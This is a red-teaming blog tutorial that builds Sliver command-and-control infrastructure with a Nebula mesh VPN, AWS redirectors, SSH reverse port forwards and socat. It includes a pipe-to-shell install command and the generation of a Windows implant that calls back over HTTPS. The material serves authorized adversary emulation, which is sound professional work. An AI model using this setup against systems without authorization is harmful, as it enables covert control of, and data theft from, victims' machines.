@April 30, 2022 6:12 PM (EDT)
Or at least done safely.
(5/18/22 Edit:) Hey there! I ended up doing a stream with Taggart on this subject . It was a good time. Check it out here:
#AttackOnTuesday: Red Team Cloud Architecture w/HuskyHacks!
Powered by Restream https://restre.am/ytIn which Husky drops by to show us how to do things properly on a red team engagement!
Let’s take a look at how to build out safe and resilient red team infrastructure from the ground up, step by step.
You may be familiar with Tim MalcomVetter’s blog post on
Safe Red Team Infrastructure, where he lays out the high level overview of how to make a safe red team operational network. That post changed my life, but it did lack the technical details on how to do this process in a practical sense.
Safe Red Team Infrastructure
This is a quick follow-up to " Responsible Red Teams." This walks at a high-level through creating a safe red team infrastructure that is hosted in your company's protected data center (firewalls, IPS, logging, packet capture, environmentals, door locks, man traps, cameras, locks, armed guards, concrete planters, tank/car bomb traps, violent yard gnomes, what-have-you).
So I wanted to write this as an answer to that blog post and combine some other wisdom I’ve picked up over the years. People like RastaMouse and byt3bl33d3r have shaped my understanding of this task.
byt3bl33d3r’s take on this task makes it into a CI/CD containerized swarm high-availability dream that scales infinitely. Rasta uses Terraform and Ansible to command cloud assets at the press of a button. They both end up with extremely impressive solutions and my HuskyHat goes off to them for it.
But for me, well, my brain is a bit more on the smooth side. My brain is so smooth you could skip it across a pond at sunrise while you meditate on your life’s choices.
So I’ll be taking the long road. My implementation has a larger footprint and takes a bit longer to set up. But it does step through each part of the setup and point out security considerations along the way.
This post should be interpreted as an instructional session for building your infrastructure. It is not all-encompassing and can probably be improved in several ways. But here, as with all things:
Understand first; automate second.
I am a fan of automation/containerization for this task, but only after understanding the major security considerations at play.
By the end of this note, if you follow the steps, you will have a small POC-sized network of red team infrastructure that can support operations. This small network will be able to scale infinitely on a mesh overlay VPN called Nebula.
Most importantly, this infrastructure will be safe and responsible from a red teaming perspective. It will minimize the risk to your client’s data as it is siphoned from their environment in a calculated fashion.
In future posts, I will write on how you can make it swat down prying eyes that try to examine your infrastructure with a little help from Nginx.
Let’s get it.
🏗️ Design Philosophy
This is from Tim MalcomVetter’s original blog post. We will use this as a reference point, but we will make several iterations and improvements on this as we go.
The following sections are collapsed into toggles for organizational purposes, but they should be followed in order.
🔴 Teamserver Setup
It all starts with your teamserver.
You will build all of this infrastructure from your teamserver, outward.
This is the server that handles all agent callbacks and serves as the locus of control for the whole operation. Your client’s data ends up here while you are nabbing it off of the endpoint.
So what does that mean? It needs to be secure.
Do not host this in the ☁️ C L O U D ☁️.
I might have lost a few of you with that last sentence, but I stand by it. There’s a long and involved argument for why this must be the case, but I’ll summarize it with this question:
Should your client’s “stolen” data reside in a cloud resource where there’s no SLA, non-disclosure understanding, and/or control over how the resources are safeguarded?
Your C2 server should be on-premise. I don’t own a datacenter with locks, guards, cameras, and all of those sweet sweet mitigative controls, so my PC in my apartment will have to suffice for this demo. The point is that my teamserver is in a location where I have physical access to the equipment and can control who else has physical access to it.
Please note: I don’t recommend running real engagements from your PC in your apartment.
FOR INSTRUCTIONAL PURPOSES ONLY
For your teamserver’s OS type, this may depend on the operation. But Kali is always a good choice. I’ve also done engagements where a simple Ubuntu Desktop host was used and it worked just fine.
⚔️ Install Your C2
Install your C2 of choice! I’m going to use Sliver for this demo because I’ve grown to like it a lot and it’s analogous to an open source Cobalt Strike of sorts.
GitHub - BishopFox/sliver: Adversary Emulation Framework
Adversary Emulation Framework. Contribute to BishopFox/sliver development by creating an account on GitHub.
Sliver has possibly the easiest install of any C2 I’ve ever seen:
┌──(kali㉿kali)-[~/Desktop] └─$ curl https://sliver.sh/install|sudo bash
┌──(kali㉿kali)-[~/Desktop] └─$ sliver 130 ⨯ Connecting to localhost:31337 ... .------..------..------..------..------..------. |S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. | | :/\: || :/\: || (\/) || :(): || (\/) || :(): | | :\/: || (__) || :\/: || ()() || :\/: || ()() | | '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R| `------'`------'`------'`------'`------'`------' All hackers gain infect [*] Server v1.5.12 - aacf2c16ac00e4609231f5faee588bdb9ea9c532 [*] Welcome to the sliver shell, please type 'help' for options sliver >
Great! Let’s put Sliver to the side for a moment.
🔑 Create some SSH Keys
Any authentication/cryptographic material should be stored on-prem. This includes
id_rsa of the key pair that we’re about to make as well as the certs for Nebula (more on this later!).
Make a directory on your teamserver and make an SSH key pair:
┌──(kali㉿kali)-[~/Desktop/certs] └─$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Desktop/certs/id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kali/Desktop/certs/id_rsa Your public key has been saved in /home/kali/Desktop/certs/id_rsa.pub The key fingerprint is: SHA256:+rsnGzLB1ZPMgDwadRjkDak2UkaFjMf9Heu+tY0gSVw kali@kali The key's randomart image is: +---[RSA 3072]----+ | =.B*=o | | . O.B+ =.. | | + +.oo.Eo | | . =. o..o. | | o .o S. | | + .. | | + +.. . | | +.ooo + | | =*..o . | +----[SHA256]-----+ ┌──(kali㉿kali)-[~/Desktop/certs] └─$ ls id_rsa id_rsa.pub
So far so good.
Let’s grab another tool we’ll use today:
Nebula. Nebula is an extremely simple way to make a mesh overlay VPN where any two points on the network will always be able to communicate provided they can reach an intermediary host. More on this later.
┌──(kali㉿kali)-[~/Desktop] └─$ mkdir nebula && cd nebula ┌──(kali㉿kali)-[~/Desktop/nebula] └─$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz --2022-04-30 10:37:50-- https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz [let that run] 2022-04-30 10:37:50 (47.2 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495] ┌──(kali㉿kali)-[~/Desktop/nebula] └─$ tar -xvf nebula.tar.gz nebula nebula-cert ┌──(kali㉿kali)-[~/Desktop/nebula] └─$ ls nebula nebula-cert nebula.tar.gz
☁️ Provision Cloud Assets
Here we go, Cloud Cowpeeps, time to stand up our cloud infrastructure. But before we do that, we need to be very, very clear.
👏 DO 👏 NOT 👏 STORE 👏 SENSITIVE 👏 MATERIAL 👏 ON 👏 YOUR 👏 CLOUD 👏 ASSETS 👏
👏 EVER 👏
The assets we’re going to provision should be treated as a contested zone. Private keys, stolen files, sensitive material of any kind must never be stored here.
The one exception to this is your Nebula host keys, which have to be on the hosts by necessity if you want them to connect to your VPN. This is a risk we’re willing to take.
I will very clearly spell out which parts of the Nebula equation should go on the cloud hosts and which ones should not. More on that in a bit.
For the demo, we’ll use this new and upcoming cloud provider called AWS. Have you heard of these guys?
We’ll start with our Listeningpost, which is our primary redirector.
Head on over to AWS. Make yourself an account if you don’t have one already
Cloud Computing Services - Amazon Web Services (AWS)
Whether you're looking for compute power, database storage, content delivery, or other functionality, AWS has the services to help you build sophisticated applications with increased flexibility, scalability and reliability Explore the AWS platform, cloud products, and capabilities Discover how AWS helps accelerate ML innovation with the right cloud services and
Once you’re logged in and have setup MFA, head over to the EC2 section:
Scroll down on the menu and go to the
Key Pairs section, then click
Import key pair from the drop down in the upper-right corner:
Grab the contents of your
id_rsa.pub file and copy them into the block on this page:
┌──(kali㉿kali)-[~/Desktop/certs] └─$ cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzy/90GFz+LCd5rrbx+RW2kdGtEDNhfbp9Me28eZ1+zM1fYbg1MdV/gRQkZTnETZnxIp5tCWUjJ8h07VLTunbLdIst9NueDDuTLYSVC+yu+vlKvFWRxYkneydqw8kkRuue1aJFYDPnOBKxOZC5ZOgE3C3y2Psba+CsjbdgnShPJiEl1Buq+knlti3ihJ9UplCVfHnqgy/4CzChopEVurOd0c2v8NiTGWIhDvbkNQmHYtcMymKZ2G66R9Ng1kHU9xNiAUxXwt7JINg6KLh9qkdHyt9u2Ua+Xbxq6pbE2Ar4Rb0Gr7mEYfVGzojN0iaYS9c1YCTvtm/PwxI0yCHOSaV/vS20y+oTg/v+hJ2Dn78m+CdRNQ1JO3pW+LaUNdlNd6XzngddW+Y6IaG9nqD8c5vruYq5WqZB4oxZQqEOuC6VWlpNgR06BZH39z1LskA+WdMJ8irJ1bvpWwT41QdpskY6JXfUCsKOhivtQHv7rmFOqAHHdc7Q7ayePS1iFeM9Qyc= kali@kali
Remember kids, the “.pub” in
id_rsa.pubmeans that you can post that key on the wall of your local pub and it would be completely fine!
Once imported, this key can be used with your cloud host:
We will now go to
EC2 > Instances > Launch an Instance
Name your host:
For application and OS Images, we’ll select Quick Start and Ubuntu for the OS:
Select a free-tier eligible instance type so we can save our monies. Also, add the key pair that we just added to the instance:
Now, this is important. In the Network Settings, we want to lock this down so SSH is only allowed from our own IP address. Go to ipchicken.com and get your internet-facing IP address and put it here, followed by a
/32 to lock it down to that IP address only:
Once this is complete, launch the instance!
Go back to
Instances and your new instance is now spinning up. Click on it and examine its settings.
We can now try SSHing into this instance from our Kali host:
While we’re here, let’s install a few tools we’re going to need shortly:
ubuntu@ip-172-31-28-251:~$ sudo apt-get update -y && sudo apt-get install socat [let that run] ubuntu@ip-172-31-28-251:~$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz [let that run] 2022-04-30 14:35:28 (96.0 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495] ubuntu@ip-172-31-28-251:~$ tar -xvf nebula.tar.gz nebula nebula-cert ubuntu@ip-172-31-28-251:~$ ls nebula nebula-cert nebula.tar.gz
Lighthouse acts as our Nebula focal point. Nebula is not a traditional hub and spoke VPN. Instead, it’s a mesh overlay VPN where any two points can communicate directly as long as they can both find the intermediary server called the Lighthouse. It’s important to note that traffic does not necessarily flow through Lighthouse to get from point A to point B. Instead, Point A identifies where Point B by querying Lighthouse and then works out the fastest way to transfer data.
arsTechnica has a great article about how this works from the high level:
How to set up your own Nebula mesh VPN, step by step
Last week, we covered the launch of Slack Engineering's open source mesh VPN system, Nebula. Today, we're going to dive a little deeper into how you can set up your own Nebula private mesh network-along with a little more detail about why you might (or might not) want to.
The cool thing about this is that once this is set up, we can scale outwards infinitely and even host each part of our infrastructure on different cloud providers.
We’re going to launch another instance with exactly the same configurations as Listeningpost and name it
Follow the rest of the instructions for setting up Listeningpost to spin up Lighthouse. I’ll leave it up to you if you want to make a new key pair for Lighthouse. For simplicity’s sake, I’m using the same key pair that was previously used.
Again, it bears repeating: lock down SSH to only allow your IP address inbound.
If all has gone well, we now have two cloud hosts:
Let’s SSH into Lighthouse:
Let’s also grab Nebula for this host:
ubuntu@ip-172-31-26-117:~$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz [let that run] 2022-04-30 14:59:37 (105 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495] ubuntu@ip-172-31-26-117:~$ tar -xvf nebula.tar.gz nebula nebula-cert
🔥 Firewall Configuration
We now need to configure our cloud assets’ firewalls. This is a balancing act because we want them permissive enough that Lighthouse and our C2 can traverse and get where it needs to go, but secure enough that we’re not over exposed.
Head over to the Network Security section of the AWS dashboard and go to the Security Groups section:
Select “Create Security Group”:
We make a new security group rule for Lighthouse that allows inbound UDP port
4242. This allows hosts in our Nebula network to query the Lighthouse for adjacent hosts in the mesh. We can afford to open this up to all IPv4 addresses because this transaction is cryptographically verified against a certificate that we will create shortly:
You can leave the Outbound rules alone. Click Create Security Group.
Back in Instances, click on the checkbox next to
lighthouse, then click
Actions > Security > Change Security Groups. In the Associated security groups drop down, select your new rule for lighthouse and select Add security group.
We will open up more ports in a bit, but this is good for now.
🌌 Set Up Nebula
🪐 Space, the final C2 frontier 🌠
It’s time to set up our Nebula network.
We’ll set up all of our required certs and configs on the on-prem teamserver and keep them there for security’s sake. Then, slowly and methodically, we’ll roll each part out to the cloud assets.
🔒Create Nebula cert files
Over on your teamserver, run the following commands:
┌──(kali㉿kali)-[~/Desktop/nebula] └─$ ls nebula nebula-cert nebula.tar.gz ┌──(kali㉿kali)-[~/Desktop/nebula] └─$ mkdir certs && mv nebula-cert certs/ ┌──(kali㉿kali)-[~/Desktop/nebula] └─$ cd certs ┌──(kali㉿kali)-[~/Desktop/nebula/certs] └─$ ./nebula-cert ca -name "ShellCorp, LLC" ┌──(kali㉿kali)-[~/Desktop/nebula/certs] └─$ ./nebula-cert sign -name "lighthouse" -ip "192.168.100.1/24" ┌──(kali㉿kali)-[~/Desktop/nebula/certs] └─$ ./nebula-cert sign -name "listeningpost" -ip "192.168.100.2/24" -groups "listening_posts" ┌──(kali㉿kali)-[~/Desktop/nebula/certs] └─$ ./nebula-cert sign -name "teamserver" -ip "192.168.100.3/24" -groups "teamservers" ┌──(kali㉿kali)-[~/Desktop/nebula/certs] └─$ ls ca.crt ca.key lighthouse.crt lighthouse.key listeningpost.crt listeningpost.key nebula-cert teamserver.crt teamserver.key
Borrowing from Marcello’s post here:
The ca.key file is the most sensitive file in this entire setup, keep it in a safe place.
📜 Create Nebula Config Files
Hosts in a Nebula network require a config file. The config files are written in YAML and are super easy to read and understand. Again, borrowing from Marcello’s post here with alterations:
pki: ca: /home/ubuntu/ca.crt cert: /home/ubuntu/lighthouse.crt key: /home/ubuntu/lighthouse.key static_host_map: "192.168.100.1": ["<LIGHTHOUSE IP>:4242"] lighthouse: am_lighthouse: true listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 192.168.100.0/24
pki: ca: /home/ubuntu/ca.crt cert: /home/ubuntu/listeningpost.crt key: /home/ubuntu/listeningpost.key static_host_map: "192.168.100.1": ["<LIGHTHOUSE IP>:4242"] lighthouse: am_lighthouse: false interval: 60 hosts: - "192.168.100.1" listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: 80 proto: any host: any - port: 443 proto: any host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 192.168.100.0/24
pki: ca: /home/kali/Desktop/nebula/certs/ca.crt cert: /home/kali/Desktop/nebula/certs/teamserver.crt key: /home/kali/Desktop/nebula/certs/teamserver.key static_host_map: "192.168.100.1": ["<LIGHTHOUSE IP>:4242"] lighthouse: am_lighthouse: false interval: 60 hosts: - "192.168.100.1" listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: 80 proto: any host: any - port: 443 proto: any host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 192.168.100.0/24
Take a quick look through these conf files and alter anything you need, like the location of the crt and key files. Make sure to swap out
<LIGHTHOUSE IP> for Lighthouse’s public IP address. This value should not change while the Nebula network is in operation. Try to keep your Lighthouse at the same IP during ops.
For ease of troubleshooting, ports 80 and 443 are set to allow any ingress traffic to the Listeningpost host. This is not particularly secure by itself, but we’ll leave these open in the Nebula config and let the AWS Security Groups do the heavy lifting for blocking traffic that we don’t want. We’ll use the security group settings to lock this down to specific IP addresses to keep here in a moment.
We can also ratchet up the security here in the firewall rules and specify hosts and protocols. Maybe you want SSH to be open to everything inside of the Nebula network, but maybe there are some hosts that you don’t want communicating. This file is where you can lock these down.
➡️ Copy Over
Copy the following files to each host via SCP or other means:
- Its specified config YAML file
- Its specified
- Its specified
ca.keysafe on your Teamserver. Do not copy it to the cloud hosts.
┌──(kali㉿kali)-[~/Desktop] └─$ scp -i certs/id_rsa [file] ubuntu@[ip]:~/[destination] [repeat for the listed files above for each host] ... ubuntu@ip-172-31-26-117:~$ ls ca.crt lighthouse-conf.yml lighthouse.crt lighthouse.key nebula nebula-cert nebula.tar.gz
🪐 Fire It Up!
Start up Lighthouse first:
ubuntu@ip-172-31-26-117:~$ sudo ./nebula -config lighthouse-conf.yml INFO Firewall rule added firewallRule="map[caName: caSha: direction:outgoing endPort:0 groups: host:any ip: proto:0 startPort:0]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:0 groups: host:any ip: proto:1 startPort:0]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:4789 groups: host:any ip: proto:0 startPort:4789]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:22 groups: host: ip:192.168.100.0/24 proto:0 startPort:22]" INFO Firewall started firewallHash=3190d01bf8eb84ecff6cfec0ba8c3ef02c117ad1900036ae1c70ceb45cdcfe56 INFO Main HostMap created network=192.168.100.1/24 preferredRanges="" INFO UDP hole punching enabled INFO Nebula interface is active build=1.5.2 interface=nebula1 network=192.168.100.1/24 udpAddr="0.0.0.0:4242"
Next, fire up the other hosts:
ubuntu@ip-172-31-28-251:~$ sudo ./nebula -config listeningpost-conf.yml INFO Firewall rule added firewallRule="map[caName: caSha: direction:outgoing endPort:0 groups: host:any ip: proto:0 startPort:0]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:0 groups: host:any ip: proto:1 startPort:0]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:80 groups: host:any ip: proto:0 startPort:80]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:443 groups: host:any ip: proto:0 startPort:443]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:4789 groups: host:any ip: proto:0 startPort:4789]" INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:22 groups: host: ip:192.168.100.0/24 proto:0 startPort:22]" INFO Firewall started firewallHash=424ddc66ba27c265fd5d30b4c9ed87c9bc5280a0a55a77a9c6f5b9bd9f057bcb INFO Main HostMap created network=192.168.100.2/24 preferredRanges="" INFO UDP hole punching enabled INFO Nebula interface is active build=1.5.2 interface=nebula1 network=192.168.100.2/24 udpAddr="0.0.0.0:4242" INFO Handshake message sent handshake="map[stage:1 style:ix_psk0]" initiatorIndex=2134990999 udpAddrs="[220.127.116.11:4242]" vpnIp=192.168.100.1 INFO Handshake message received certName=lighthouse durationNs=2397928 fingerprint=98142c9a9c5cf70553f68948cadc14e0266ace7910fa1d8af22bcde8506eeb49 handshake="map[stage:2 style:ix_psk0]" initiatorIndex=2134990999 issuer=b221b8d0ae4a395d6f5222af65c874bef347298d4ccc9bdbc189fe526a8c6a6e remoteIndex=2134990999 responderIndex=1922843025 sentCachedPackets=1 udpAddr="18.104.22.168:4242" vpnIp=192.168.100.1
The “Handshake message received” is what we’re looking for here. If you inspect your Teamserver’s interfaces, you should see the new
┌──(kali㉿kali)-[~/Desktop] └─$ ip -br -c a lo UNKNOWN 127.0.0.1/8 ::1/128 eth0 UP 10.10.1.132/24 fe80::20c:29ff:fe00:2db6/64 docker0 DOWN 172.17.0.1/16 nebula1 UNKNOWN 192.168.100.3/24 fe80::830:a71e:a538:2c93/64
ayyy! And we can ping to verify connectivity:
┌──(kali㉿kali)-[~/Desktop] └─$ ping -c 1 192.168.100.1 130 ⨯ PING 192.168.100.1 (192.168.100.1) 56(84) bytes of data. 64 bytes from 192.168.100.1: icmp_seq=1 ttl=64 time=27.5 ms --- 192.168.100.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 27.499/27.499/27.499/0.000 ms
⛓️ Set Up Reverse Port Forwarding & SOCAT
Our next objective is to ensure traffic can traverse from Listeningpost’s external IP address all the way back to our teamserver. We’ll prove this concept with port 80 and standard HTTP before we bump up the OPSEC and set up HTTPS.
To do this securely, we will create a reverse port forward from the teamserver to the Listeningpost. Reading Tim MalcomVetter’s original blog post:
To do this, on the teamserver we do the following:
(Note: I’ve now added
lighthouse to my
/etc/hosts on the teamserver by their Nebula IP addresses for simplicity).
┌──(kali㉿kali)-[~/Desktop] └─$ ssh -N -R 8080:localhost:80 -i certs/id_rsa ubuntu@listeningpost 130 ⨯ The authenticity of host 'listeningpost (192.168.100.2)' can't be established. ED25519 key fingerprint is SHA256:gNM2mXEqesJwS0BUvdKwABrRygbdfGS6R5Ah/2um/ZY. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:1: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'listeningpost' (ED25519) to the list of known hosts.
There is no other output in the terminal, but once we go view
ss -plant on Listeningpost...
Great! We now have a listening port on the localhost of Listeningpost.
Now we need to bind a port on Listeningpost’s IP address and send it to out reverse port forward. We specify its private IPv4 address here, knowing that this is downstream of the external public facing IP address on the same host.
We can do this with
ubuntu@ip-172-31-28-251:~$ sudo socat tcp-listen:80,reuseaddr,fork,bind=172.31.28.251 tcp:127.0.0.1:8080
Again, there is no feedback in the terminal.
Now, we won’t be able to traverse from our Listeningpost’s external IP just yet. We need to add a rule in our cloud security group to allow specific ingress traffic.
For this demo, I will open ingress traffic on port 80 and lock it down specifically to my own public IP address to keep prying eyes away for now:
Now, add this security group rule to our Listeningpost instance:
Now over on our teamserver:
┌──(kali㉿kali)-[~/Desktop] └─$ mkdir www ┌──(kali㉿kali)-[~/Desktop] └─$ cd www ┌──(kali㉿kali)-[~/Desktop/www] └─$ echo "It works\!" > index.html ┌──(kali㉿kali)-[~/Desktop/www] └─$ sudo python3 -m http.server 80 [sudo] password for kali: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
If all has gone according to plan, if I browse to Listeningpost’s public IP address, I should be routed through that interface, hit the
socat redirector that bounces inbound TCP/80 to our reverse port forward, which ends up on our Teamserver that is now serving out our test HTML page.
It’s worth noting here: always test your infrastructure in little increments. It’s a lot easier to figure out what went wrong if you go step by step like I just did. It’s a lot harder when you run off to the race track and spin up a ton of infra, your C2, firewalls, Nebula, etc etc and then can’t figure out why your payload isn’t working.
🔒 OPSEC, Ahoy! TLS and HTTPS
So far so good, but let’s keep this 💯 and use end-to-end encryption.
To do this, we need a TLS certificate. Now, you can always go the long route of purchasing one from Namecheap or another DNS provider, but that’s a lot for a demo like this. In real life, you’ll go through the painful process of procuring domain names and registering certs for them.
If you’ve never had the pleasure of setting up SSL certs before, consider yourself lucky. It’s...a bit involved. It’s a great task to make the new red teamers on your team do. Or at least that’s what everyone told me.
Create a self-signed cert:
┌──(kali㉿kali)-[~/Desktop/ssl] └─$ openssl req -new -x509 -sha256 -newkey rsa:2048 -nodes \ 1 ⨯ -keyout fancyladsnacks.key.pem -days 365 -out fancyladsnacks.cert.pem Generating a RSA private key ...................................................................+++++ ............+++++ writing new private key to 'fancyladsnacks.key.pem' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Someplace Locality Name (eg, city) :Somename Organization Name (eg, company) [Internet Widgits Pty Ltd]:Fancyladsnacks Organizational Unit Name (eg, section) :IT Common Name (e.g. server FQDN or YOUR name) :fancyladsnacks.info Email Address :firstname.lastname@example.org ┌──(kali㉿kali)-[~/Desktop/ssl] └─$ ls fancyladsnacks.cert.pem fancyladsnacks.key.pem
On the teamserver, set up the HTTPS listener and point it at your certs:
sliver > https --cert /path/to/fancyladsnacks.cert.pem --key /path/to/fancyladsnacks.key.pem [*] Starting HTTPS freetshirts.info:443 listener ... [*] Successfully started job #1
We now create an agent:
sliver > generate --http https://fancyladsnacks.info [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled ... [*] Build completed in 00:00:25 [*] Implant saved to /home/kali/Desktop/SORRY_FAILURE.exe
That agent name is a bit on the nose, but we’ll roll with it.
The implant is listed as an HTTP agent, but this option services both HTTP and HTTPS listeners.
Meanwhile, I go back and make another security group setting that allows HTTPS inbound to Listeningpost and lock it down to my own IP address:
For instructional purposes only, I add Listeningpost’s public IP to my test target’s hosts file. In real life, you’ll register a legitimate DNS record to point to Listeningpost.
We reconfigure the reverse port forward and the
socat listener on Listeningpost:
┌──(kali㉿kali)-[~/Desktop] └─$ sudo ssh -N -R 8443:localhost:443 -i certs/id_rsa ubuntu@listeningpost ubuntu@ip-172-31-28-251:~$ sudo socat tcp-listen:443,reuseaddr,fork,bind=172.31.28.251 tcp:127.0.0.1:8443
If all has gone according to plan, we can land this agent anywhere in the world and we’ll get an end-to-end encrypted callback session when it is executed provided it can reach the IP at fancyladsnacks.info.
Hey, this wouldn’t be a bad time to include
autossh so your reverse port forward happens automagically:
┌──(kali㉿kali)-[~/Desktop] └─$ nano ~/.ssh/config Host listeningpost HostName 192.168.100.2 User ubuntu Port 22 IdentityFile /home/kali/Desktop/ssh/id_rsa RemoteForward 8443 localhost:443 ServerAliveInterval 30 ServerAliveCountMax 3 ┌──(kali㉿kali)-[~/Desktop] └─$ autossh -M 0 -f -N listeningpost
However you decide to get the Sliver agent to the target is on you and outside the scope of this post. I’d recommend hosting it on a completely separate payload server. But once it has been downloaded and executed...
🐰 Follow The White Rabbit
Let’s think through how our traffic is now getting from the target to our teamserver:
- 👾The Sliver agent is executed on the target. It has been configured to go find https://fancyladsnacks.info using HTTPS, so it calls out to this DNS record.
- 📡 In real life, DNS resolution would occur. In this experiment, the hosts file directs the agent to Listeningpost’s external IP address.
- ↔️ Listeningpost uses a socat redirector bound to its public IP address to redirect traffic to a reverse port forward on port 8443. No SSL decryption takes place here. No files are stored here. The Listeningpost’s main job is to pass traffic along and it does this with VIGOR.
- 🪐 Our Nebula VPN configuration creates a mesh overlay network where the Listeningpost knows the Teamserver, and vice versa, by communicating with the Lighthouse. Both Lighthouse and Listeningpost are cloud provisioned assets and can be torn down and reprovisioned with relative ease.
- ⚔️ The reverse port forward on port 8443 is established by SSH on our Teamserver, which uses Lighthouse to identify Listeningpost. Teamserver initiates this because the SSH keys are stored on Teamserver. The public keys have been copied to all hosts in the Nebula network, but the private keys (along with the Nebula cert key) are safe on our Teamserver which is secured in our
gigantic vault with robot guards and turrets apartmenton premise location.
- 🟢 The agent’s traffic is forwarded to the localhost of the Teamserver, where Sliver’s listener has been configured to catch the incoming connection. SSL decryption takes place here, the agent authenticates to the Sliver server, and comms flow securely between the two end points.
It’s safe and sound. Fight’s on!
🍣 The Roll Up (Sushi Roll, Get It? Like A Sushi Roll. Because... Nevermind)
That’s a lot for now, so let’s recap.
We’ve used the design philosophy of Tim MalcomVetter’s Safe Red Team Infrastructure blog post to implement a C2 architecture that keeps our client’s data safe as we pilfer it from the endpoint.
We also used some of byt3bl33d3r’s finess to make our infrastructure scalable and resilient with the help of Nebula.
We stood up infrastructure that started at our teamserver and worked outward. Each step, we tested and ensured the infra was working as intended. We used cloud provisioned assets responsibly to help out our infrastructure but ensured that no sensitive data would end up on those hosts.
I think that’s all for now because this post is now enormous. But in the next post, I’ll show how to install a proxy that will assess incoming traffic and redirect it to keep blue teamers off our backs.
Until next time!
— — — — — — > Back to
🌐 Where You Can Find Me
The Taggart Institute: Master Your Craft
Great hackers are good people. Many courses on red teaming will teach you the technical process of how to exploit targets. But seldom do courses cover what it means to carry out the role of a red teamer responsibly.
TryHackMe | Takedown
We have reason to believe a corporate webserver has been compromised by RISOTTO GROUP. Cyber interdiction is authorized for this operation. Find their teamserver and take it down.
Practical Malware Analysis & Triage
Arm yourself with knowledge and bring the fight to the bad guys! Practical Malware Analysis & Triage (PMAT) brings the state of the art of malware analysis to you in engaging instructional videos and custom made, practical labs. Welcome to Practical Malware Analysis & Triage.
GitHub - HuskyHacks/PMAT-labs: Labs for Practical Malware Analysis & Triage
Welcome to the labs for Practical Malware Analysis & Triage. Read this carefully before proceeding. This repository contains live malware samples for use in the Practical Malware Analysis & Triage course (PMAT). These samples are either written to emulate common malware characteristics or are live, real world, "caught in the wild" samples.
📝Recent Blog Posts
TryHackMe: Takedown Walkthrough
This is the official walkthrough for this room. I did not cover every single detail available but do cover enough to get from start to finish. Obviously, major spoilers are ahead from here on out.
Malware Analysis Labs: Internal Network vs Host-Only
"If Host-Only mode allows a VM to route to the physical host in some circumstances, can it really be considered safe for malware analysis?" I applaud my students for approaching me about this because it means they are thinking critically about safety during malware analysis.
How To HACK Your EX'S SOCIAL MEDIA ACCOUNTS (REAL GUIDE)
What better way to get revenge than to your ? That's where I, 0xTastyyboi, come in. I'm going to show you all that you need to know to EX'S SOCIAL MEDIA ACCOUNTS your . EX'S SOCIAL MEDIA ACCOUNTS ... Kali doesn't have notepad.exe ? What the hell is...
Red Team Infrastructure Done Right
You may be familiar with Tim MalcomVetter's blog post on Safe Red Team Infrastructure , where he lays out the high level overview of how to make a safe red team operational network. That post changed my life, but it did lack the technical details on how to do this process in a practical sense.
We Put A C2 In Your Notetaking App: OffensiveNotion
Notion is a popular notetaking application. It has lots of great features that make notetaking a snap. Some of the features we love the most include the capability to share notebooks across teams, push notes to cloud storage, build custom templates, and, in general, deck out your pages so they feel like they have lots of personality!
DLL Hijacking & DLL Proxying An SNES Emulator
